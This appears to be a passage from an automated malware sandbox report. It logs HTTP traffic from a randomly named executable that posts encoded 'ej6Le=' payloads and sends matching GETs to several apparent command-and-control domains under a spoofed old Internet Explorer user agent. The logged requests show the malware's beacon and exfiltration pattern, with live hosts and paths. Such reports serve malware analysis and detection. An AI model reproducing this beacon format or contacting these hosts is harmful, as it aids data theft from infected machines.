                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.golizle22.xyz
                                                                                                                              Origin: http://www.golizle22.xyz
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.golizle22.xyz/kpbt/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 57 78 36 58 6c 4c 73 2f 43 4e 33 66 38 4d 46 67 74 6b 74 37 2f 6d 50 78 49 38 4b 44 57 34 6a 6e 37 4c 76 44 56 4f 44 67 53 6d 37 68 65 51 47 36 58 76 68 53 78 61 32 43 51 36 34 57 46 54 79 75 5a 4b 67 30 43 52 30 76 58 45 76 67 61 67 33 67 4c 2f 4f 35 57 74 2b 2b 75 54 79 67 6d 6d 6f 75 47 57 77 32 68 74 71 56 53 64 42 66 2b 48 37 6c 7a 4a 72 6d 36 31 48 4f 43 4b 65 30 77 62 39 66 6e 4d 70 6d 4c 64 59 75 65 79 6f 56 77 51 55 6f 31 35 34 71 57 59 42 7a 51 5a 51 59 72 67 52 47 37 2b 36 44 49 66 36 74 6a 57 2f 31 79 2f 32 79 74 4d 74 75 58 71 56 36 37 31 39 41 50 69 74 4e 54 4f 7a 6f 4e 34 45 38 38 79 6a 30 39 69 66 61 43 55 2b 70 74 6e 31 36 44 79 46 75 68 2f 4a 6f 68 51 4d 55 54 30 71 72 77 76 2b 34 6c 2b 6b 74 4a 59 45 58 6c 64 6a 72 76 67 55 45 50 6d 69 78 52 76 67 4e 53 64 49 38 48 77 4a 65 6e 54 78 34 51 52 66 6e 39 54 39 44 51 59 44 34 73 52 53 31 52 6f 4b 32 6b 73 4c 72 48 6d 51 30 30 6f 53 6d 6e 6f 75 62 65 70 41 6b 50 52 42 54 36 54 46 69 42 62 50 72 62 62 49 32 71 74 55 65 [TRUNCATED]
                                                                                                                              Data Ascii: ej6Le=Wx6XlLs/CN3f8MFgtkt7/mPxI8KDW4jn7LvDVODgSm7heQG6XvhSxa2CQ64WFTyuZKg0CR0vXEvgag3gL/O5Wt++uTygmmouGWw2htqVSdBf+H7lzJrm61HOCKe0wb9fnMpmLdYueyoVwQUo154qWYBzQZQYrgRG7+6DIf6tjW/1y/2ytMtuXqV6719APitNTOzoN4E88yj09ifaCU+ptn16DyFuh/JohQMUT0qrwv+4l+ktJYEXldjrvgUEPmixRvgNSdI8HwJenTx4QRfn9T9DQYD4sRS1RoK2ksLrHmQ00oSmnoubepAkPRBT6TFiBbPrbbI2qtUeHkKfGbua+0I9eztl/Xgi8tg800IYOL9+L8QNmwzqkad091hwMplAzeZFIHD5rCXc1ltRC++x9Bzsq4NMeGtRrUAx1UKYdnTEvK5pP7aP/4VVIP2Fq73dNRY2W95boirRPk0LxwvUVSudEOKG7SbW0d6EpX00wMR2I5RP4tnfv915JUzthb1Z3LZaYDAs+lsmemoO4S4Nm2quHfcK6C2PQkXRKjKNw+NrUgUNCsgQgkNmbXezmysA/UzpDGMV2SFjEjpVm4qNR0diCVSwAZlcqR/pS6YkWh6jMb4H7rPiilxJ9i2SqKfTOzF26icXrpTuQQiyBLsWkbdFZdtl69iAW944/n7T4TLvJSyildiuJ7OmfyXwIdHTs1WC/93wgJzrIorUSO4T/ClGT+n/VW7V5RQwXRMK4cWVsW3ZTPZLEs2vu4oAvXZPjb2dFoIv0JuGp4tR6E/evCSNLeC+lR+CWzZDmwwb341oBEKe0dbxKwQfEchdKWJFAE4ZLZEErJP8QNPY8xD0NK/XRnzZz4segeNKuutGIbUKOqbnk5a2tVYdpiK0vtPKJHZi5pegiIBxwaZFo71zmwmPqZ36ah3Nz91esYFkkgayFQPo8A5D2BPTWS/oTu9vbxYjKMWM1J8pCuy1neStZw5FB70w/0n+MOA0WO6sWJOfRI [TRUNCATED]
                                                                                                                              Oct 7, 2024 12:34:05.847724915 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:05 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DlypyjFHiEkxP%2Bd7LkTEOG1O1ahbNnUfRqpTE%2F8oY2YD5rdrOwG22n82myIHMqH6%2BgiKJ9DcTzCK6DWaoZPrPeo%2FELQyrk8ZyEtk6Rlv%2BhUhG60qzttPcdtsJRWKZKsQa0Wg0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ced3c97ff1141df-EWR
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                                                                                                                              Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!E@G#F,[c]>yl
                                                                                                                              Oct 7, 2024 12:34:05.847742081 CEST195INData Raw: 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72 b5 9a c3 e3 24 ae 6f ae 80 6c 40 9e ba b0 f1 f5 ad 77 5b 65 0e 30 b8 1d 7a 54 d0 1c e0 0b 31 7e 1b 10 15 fc 87 0d
                                                                                                                              Data Ascii: o:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?e0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.2.649999104.21.5.125801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:07.574522018 CEST505OUTGET /kpbt/?An=mLdxo2Y8RLRh&ej6Le=bzS3m8wIdYLAo6JC2B8v6DjkcYKoJ+/o0NmGFeD5SFiVCQOeD71i1fiBX/Z3MR+4fZ4gDTM+AXXLFXHhSs/mG9Ow8FixmQY8Mzsb0tyXAIso2XGTy+nTpErXCIb5tNtL4I1fOo4= HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.golizle22.xyz
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:34:08.398132086 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:08 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              vary: accept-encoding
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FQpy3yq3u3lgGcrRTufJL2fOEYn2ANFOb%2FgwsKv8PCDybak1Mlt79eFmPM7Nd%2BcdtCRHAGAX6FLCfT1S8uhVu3ZdUzmS95LjP%2F2KF%2F9902u0BqHHwDfBnUjsAoyoXaI7JH9fQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ced3ca7eac88cc6-EWR
                                                                                                                              Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 [TRUNCATED]
                                                                                                                              Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left:
                                                                                                                              Oct 7, 2024 12:34:08.398183107 CEST758INData Raw: 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74
                                                                                                                              Data Ascii: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              9192.168.2.6500003.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:13.454796076 CEST787OUTPOST /fp1z/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.impulsarnegocios.info
                                                                                                                              Origin: http://www.impulsarnegocios.info
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.impulsarnegocios.info/fp1z/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 5a 4f 56 70 47 41 66 45 56 2f 74 30 6d 6f 59 66 44 58 4f 54 65 43 51 48 52 30 53 54 44 79 31 41 72 59 4e 70 37 59 49 32 4c 79 49 39 6f 51 4c 69 6e 79 75 4e 4d 77 34 34 6a 39 50 4b 52 65 31 58 63 4e 55 4c 66 53 56 4b 69 41 50 4f 6d 33 35 41 76 66 36 4d 32 48 31 33 53 33 30 39 76 36 57 38 39 35 76 61 51 59 58 65 67 63 32 53 64 65 4c 57 43 6b 76 6f 58 4f 78 45 4d 4a 78 4a 63 6c 38 51 43 56 53 71 6c 57 30 32 52 75 6c 31 32 32 38 46 50 4e 4b 32 44 74 74 70 68 59 58 5a 5a 34 4b 49 63 54 64 48 67 70 41 4d 5a 73 72 49 6d 34 7a 79 43 53 69 2b 6d 46 34 66 61 55 43 36 4a 6b 57 4c 48 43 49 6b 78 4d 2b 49 52 70 34 7a
                                                                                                                              Data Ascii: ej6Le=ZOVpGAfEV/t0moYfDXOTeCQHR0STDy1ArYNp7YI2LyI9oQLinyuNMw44j9PKRe1XcNULfSVKiAPOm35Avf6M2H13S309v6W895vaQYXegc2SdeLWCkvoXOxEMJxJcl8QCVSqlW02Rul1228FPNK2DttphYXZZ4KIcTdHgpAMZsrIm4zyCSi+mF4faUC6JkWLHCIkxM+IRp4z


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              10192.168.2.6500013.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:15.997273922 CEST811OUTPOST /fp1z/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.impulsarnegocios.info
                                                                                                                              Origin: http://www.impulsarnegocios.info
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.impulsarnegocios.info/fp1z/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 5a 4f 56 70 47 41 66 45 56 2f 74 30 6e 49 6f 66 50 57 4f 54 59 69 51 47 55 30 53 54 4b 53 30 48 72 59 52 70 37 5a 4e 72 4d 41 38 39 70 78 37 69 6d 32 61 4e 4c 77 34 34 73 64 50 50 66 2b 30 56 63 4e 49 35 66 54 46 4b 69 41 62 4f 6d 79 39 41 76 4d 69 50 32 58 30 52 48 6e 30 37 69 61 57 38 39 35 76 61 51 63 2b 37 67 59 61 53 65 75 37 57 42 46 76 6e 55 4f 78 4c 63 5a 78 4a 59 6c 38 55 43 56 53 55 6c 58 6f 4d 52 71 56 31 32 79 77 46 4f 65 53 31 4e 74 74 72 76 34 57 70 51 36 54 34 62 43 31 47 6a 70 63 39 48 73 44 5a 71 75 79 6f 65 68 69 64 30 56 59 64 61 57 61 49 4a 45 57 68 46 43 77 6b 6a 62 79 76 65 64 64 51 30 58 39 33 4a 79 74 68 67 69 41 49 77 51 62 48 58 59 71 2b 6b 51 3d 3d
                                                                                                                              Data Ascii: ej6Le=ZOVpGAfEV/t0nIofPWOTYiQGU0STKS0HrYRp7ZNrMA89px7im2aNLw44sdPPf+0VcNI5fTFKiAbOmy9AvMiP2X0RHn07iaW895vaQc+7gYaSeu7WBFvnUOxLcZxJYl8UCVSUlXoMRqV12ywFOeS1Nttrv4WpQ6T4bC1Gjpc9HsDZquyoehid0VYdaWaIJEWhFCwkjbyveddQ0X93JythgiAIwQbHXYq+kQ==


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              11192.168.2.6500033.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:18.537975073 CEST1824OUTPOST /fp1z/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.impulsarnegocios.info
                                                                                                                              Origin: http://www.impulsarnegocios.info
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.impulsarnegocios.info/fp1z/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 5a 4f 56 70 47 41 66 45 56 2f 74 30 6e 49 6f 66 50 57 4f 54 59 69 51 47 55 30 53 54 4b 53 30 48 72 59 52 70 37 5a 4e 72 4d 41 6b 39 70 44 7a 69 6e 52 47 4e 4b 77 34 34 68 39 50 4f 66 2b 30 55 63 4e 42 79 66 57 64 77 69 43 6a 4f 33 6b 42 41 37 74 69 50 38 58 30 52 46 6e 30 36 76 36 57 70 39 39 44 65 51 59 69 37 67 59 61 53 65 74 7a 57 56 6b 76 6e 53 4f 78 45 4d 4a 78 4e 63 6c 39 7a 43 56 4b 69 6c 58 39 75 51 5a 64 31 32 53 67 46 4a 74 32 31 53 64 74 74 6f 34 57 78 51 36 76 6e 62 43 34 33 6a 71 42 67 48 72 7a 5a 70 36 33 43 48 78 53 6e 6f 6a 51 78 43 6d 71 4c 50 43 47 74 4c 52 64 55 73 34 79 7a 65 4a 4a 76 73 41 74 41 63 7a 63 2b 6f 6a 38 6b 32 77 71 71 55 72 47 37 30 61 43 7a 79 34 59 35 76 74 78 79 47 71 38 50 36 6c 64 4a 32 57 79 6f 46 76 55 30 42 30 45 58 69 2b 78 73 61 56 50 4d 64 52 64 4e 79 55 46 76 6b 7a 67 33 4a 57 72 33 34 38 7a 76 57 6b 51 58 46 74 77 65 35 66 4b 5a 65 30 59 73 73 78 35 4a 4f 54 53 67 37 4c 76 37 67 68 7a 47 4c 4b 53 59 32 67 4e 56 5a 34 75 45 67 57 36 65 [TRUNCATED]
                                                                                                                              Data Ascii: ej6Le=ZOVpGAfEV/t0nIofPWOTYiQGU0STKS0HrYRp7ZNrMAk9pDzinRGNKw44h9POf+0UcNByfWdwiCjO3kBA7tiP8X0RFn06v6Wp99DeQYi7gYaSetzWVkvnSOxEMJxNcl9zCVKilX9uQZd12SgFJt21Sdtto4WxQ6vnbC43jqBgHrzZp63CHxSnojQxCmqLPCGtLRdUs4yzeJJvsAtAczc+oj8k2wqqUrG70aCzy4Y5vtxyGq8P6ldJ2WyoFvU0B0EXi+xsaVPMdRdNyUFvkzg3JWr348zvWkQXFtwe5fKZe0Yssx5JOTSg7Lv7ghzGLKSY2gNVZ4uEgW6eJSTT/1CVZGcN0dZwEa0PC2mTJiT3uRGQCSt/2TsPwOyXn3kRmXlWirFlW6PT1nDZ2GFsuCUU5ZvA6+OAIo/f+TqIR71Q7P2jYaCxor0Kdf2lGFDiXhvAKgZ1iJIJ0AfMlrSsJi6r7n/WUDH/XFSytRKg6WB58qjnPcjtFLXOFCSTNKH+Pd7zRXIgoEvz6Q0DjRH7vi2xxLL5RY2fNM3BmM15uKcsxfydrCIuTH4j/wHL8rUal3tUfGAKOa1ZmIr+0U3DOR6WJ8KpyTOWubWRgV1B7yFvQCXwy3Rj7IXibq2Adl9jYMIBl50xEnXFyuqRpTIGPspRLrVGPcJX7NV2DOQR/OJGf5DrszLIbQV3PaImN6tkBgSQKKcQhr20oT/xHLmD7fGfA9Ob8tXRV+qwzyYXQ9h5G64xmK/IypSIotp9AiL2Mr0Hmfhcu75GT/ACnCUe6O9E7UVonyc0eo9Dv6WjuaZ4lK/lJfazTMQu30T5iVta3GVkJoO8eceP/JI+NysHAxwsgoSPBD/qXb1dJ8yGU6DvOwht98HuoL8binHLQCWowLsdS2Am1qRDnaZkwk7XrX0bil9MVFCUO5o/NYyRDIbeJNMTyQALiYnwl/uMQelYS5uC1zcT0WEP1A4TUEhq6wjVhVhYw8TFogRJFGQkYSlZPqxnMM [TRUNCATED]


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              12192.168.2.6500043.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:21.068662882 CEST513OUTGET /fp1z/?ej6Le=UM9JF3nEU4xQ/PwLWGC6ZGprDkqeXDETquU6+bQNCANtrDf9n2+FDVI8iqG/UPksDfc6HQNuzTnZ4EJOssmSqFcoG0I3gKiI2YTwSr3+9s/MRsmHXzjzE9U3d6U0PlwuaFK3vCk=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.impulsarnegocios.info
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:34:22.446708918 CEST413INHTTP/1.1 200 OK
                                                                                                                              Server: openresty
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:22 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 273
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 6a 36 4c 65 3d 55 4d 39 4a 46 33 6e 45 55 34 78 51 2f 50 77 4c 57 47 43 36 5a 47 70 72 44 6b 71 65 58 44 45 54 71 75 55 36 2b 62 51 4e 43 41 4e 74 72 44 66 39 6e 32 2b 46 44 56 49 38 69 71 47 2f 55 50 6b 73 44 66 63 36 48 51 4e 75 7a 54 6e 5a 34 45 4a 4f 73 73 6d 53 71 46 63 6f 47 30 49 33 67 4b 69 49 32 59 54 77 53 72 33 2b 39 73 2f 4d 52 73 6d 48 58 7a 6a 7a 45 39 55 33 64 36 55 30 50 6c 77 75 61 46 4b 33 76 43 6b 3d 26 41 6e 3d 6d 4c 64 78 6f 32 59 38 52 4c 52 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ej6Le=UM9JF3nEU4xQ/PwLWGC6ZGprDkqeXDETquU6+bQNCANtrDf9n2+FDVI8iqG/UPksDfc6HQNuzTnZ4EJOssmSqFcoG0I3gKiI2YTwSr3+9s/MRsmHXzjzE9U3d6U0PlwuaFK3vCk=&An=mLdxo2Y8RLRh"}</script></head></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              13192.168.2.650005162.0.215.33801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:27.501383066 CEST787OUTPOST /odii/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.nieuws-july202541.sbs
                                                                                                                              Origin: http://www.nieuws-july202541.sbs
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.nieuws-july202541.sbs/odii/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 51 58 70 48 38 4c 6c 73 75 51 34 71 59 42 48 43 52 61 57 58 73 69 6c 34 69 4f 42 77 52 5a 39 4b 56 72 65 77 67 78 59 72 39 58 69 30 41 49 6d 42 51 72 31 4a 78 4d 6d 58 33 31 4a 6d 79 67 64 36 42 6f 46 61 47 42 7a 35 48 49 31 43 45 59 53 4f 4c 47 67 43 48 68 39 2f 6f 4a 62 47 32 6e 6c 49 4a 30 6a 66 34 69 4c 49 2b 41 78 66 51 4c 57 6e 64 63 54 4f 57 4d 50 4c 51 63 35 72 7a 77 62 35 49 47 51 54 5a 49 63 75 74 34 59 76 4b 67 63 77 30 76 44 6a 41 4e 54 58 77 65 46 6a 76 57 79 48 56 47 4c 6f 4b 44 59 6c 72 34 38 35 50 4b 68 63 30 4c 66 71 6d 51 37 43 4b 75 59 62 43 41 50 69 73 6d 6a 4c 43 77 4d 30 73 45 36 67
                                                                                                                              Data Ascii: ej6Le=QXpH8LlsuQ4qYBHCRaWXsil4iOBwRZ9KVrewgxYr9Xi0AImBQr1JxMmX31Jmygd6BoFaGBz5HI1CEYSOLGgCHh9/oJbG2nlIJ0jf4iLI+AxfQLWndcTOWMPLQc5rzwb5IGQTZIcut4YvKgcw0vDjANTXweFjvWyHVGLoKDYlr485PKhc0LfqmQ7CKuYbCAPismjLCwM0sE6g
                                                                                                                              Oct 7, 2024 12:34:28.111026049 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                              keep-alive: timeout=5, max=100
                                                                                                                              content-type: text/html
                                                                                                                              transfer-encoding: chunked
                                                                                                                              content-encoding: gzip
                                                                                                                              vary: Accept-Encoding
                                                                                                                              date: Mon, 07 Oct 2024 10:34:28 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              connection: close
